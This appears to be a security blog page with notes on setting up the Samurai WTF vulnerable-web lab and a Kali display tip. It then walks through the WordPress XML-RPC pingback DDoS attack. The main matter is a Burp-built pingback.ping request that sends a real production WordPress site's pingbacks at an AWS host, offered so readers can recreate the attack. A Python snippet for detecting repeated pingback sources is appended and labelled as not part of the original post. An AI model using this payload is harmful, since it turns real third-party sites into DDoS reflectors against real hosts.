
Samurai WTF

Download and install Samurai for VMware Workstation (https://sourceforge.net/projects/samurai/files/)

Unzip the download and double-click the *.vmx file

Default Username/password: samurai/samurai

Samurai has vulnerable websites:

  • Dojo-Basics
  • bWAPP
  • DVWA
  • Mutillidae

Allow network access to them by modifying the *.conf files, which can be found in /etc/apache2/sites-available.

To open the file use this command: sudo gedit bwapp.conf

Check to see which services are running on which ports by using this command: grep -ri listen /etc/apache2

Modify the IP address from <IP>:<port> to *:<port>

Save the files

Restart Apache using this command: /etc/init.d/apache2 restart

This error means that more than one service is running on the same ports.

Change Resolution size in Kali using Command Line

To change the screen resolution in Kali from the terminal, first list the available modes by typing

xrandr

Then choose your desired dimension by typing

xrandr -s 1280x768

WordPress XMLRPC.php DDOS Attack

The Bigger They Come, The Harder They Fall

Earlier this year a vulnerability was exploited which used the PingBack feature in WordPress. I am going to show how to create a request to recreate the attack. The attack sent upwards of 400 Gbps through the internet. By comparison, your home network is, on a good day, theoretically 100 Mbps. This attack pumped 40x more traffic than your home network can ever do.

I created the request in Burp Proxy:

POST /xmlrpc.php HTTP/1.0
Host: https://prod.nestle-hcp.com.au/breastfeeding/
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://ec2-107-22-52-34.compute-1.amazonaws.com</string></value>
</param>
<param>
<value>
<string>https://prod.nestle-hcp.com.au/?p=45</string>
</value>
</param>
</params>
</methodCall>
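
Seen from the receiving WordPress server, abuse of this call shows up as one host being named again and again as the pingback source (the first parameter). The Python below is an added example, not part of the original post: it assumes the POST bodies sent to xmlrpc.php are available (for instance from a WAF or proxy log), and the function names, threshold and sample hosts are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from collections import Counter
from urllib.parse import urlsplit

def parse_pingback(body):
    """Return (source_uri, target_uri) for a pingback.ping call, else None."""
    # An XML-RPC call never needs a DTD; refusing one keeps entity-expansion
    # payloads away from the parser.
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        return None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    name = (root.findtext("methodName") or "").strip()
    if root.tag != "methodCall" or name != "pingback.ping":
        return None
    # A <value> with no type element is a string by XML-RPC convention.
    args = [(v.findtext("string") or v.text or "").strip()
            for v in root.findall("./params/param/value")]
    return (args[0], args[1]) if len(args) == 2 else None

def reflection_victims(bodies, threshold=3):
    """Map each host named as pingback source >= threshold times to its count."""
    hits = Counter()
    for body in bodies:
        call = parse_pingback(body)
        try:
            host = urlsplit(call[0]).hostname if call else None
        except ValueError:  # malformed URI, e.g. an unclosed IPv6 bracket
            continue
        if host:
            hits[host] += 1
    return {h: n for h, n in hits.items() if n >= threshold}

def sample_body(source, target):
    """Constructed request body in the shape shown in the post."""
    return ('<?xml version="1.0"?><methodCall>'
            '<methodName>pingback.ping</methodName><params>'
            f'<param><value><string>{source}</string></value></param>'
            f'<param><value><string>{target}</string></value></param>'
            '</params></methodCall>')

# Constructed sample data: four calls naming one source host, plus noise.
SAMPLE_BODIES = (
    [sample_body("http://victim.example/", f"http://blog.example/?p={i}") for i in range(4)]
    + [sample_body("http://friend.example/post", "http://blog.example/?p=1"),
       "<methodCall><methodName>system.listMethods</methodName><params/></methodCall>",
       "not xml"])
```

Calling reflection_victims(SAMPLE_BODIES) reports only the host that was named four times; the single ordinary pingback, the unrelated method call and the unparseable body are ignored.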
